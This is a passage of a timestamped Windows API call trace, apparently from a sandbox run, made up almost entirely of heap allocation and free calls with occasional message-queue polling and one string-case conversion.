Flags=0x0, Size=0x10) returned 0x9bd858 [0178.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0178.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0178.183] FreeLibrary (hLibModule=0x75c90000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.184] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0178.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.184] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0178.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0178.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0178.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0178.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0178.185] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0178.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0178.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0178.185] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0178.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0178.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0178.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b20 [0178.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0178.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0178.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0178.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0178.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0178.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0178.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0178.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b50 [0178.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0178.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0178.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0178.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0178.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0178.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0178.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0178.187] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0178.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0178.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0178.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0178.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0178.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0178.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0178.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0178.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0178.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0178.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0178.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0178.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0178.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.188] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0178.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.189] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0178.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd930 [0178.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0178.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdae0 [0178.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0178.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f70 [0178.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f58 [0178.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0178.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9a8 [0178.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0178.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0178.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0178.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd480 [0178.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0178.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0178.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0178.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0178.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0178.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0178.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0178.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0178.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0178.191] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 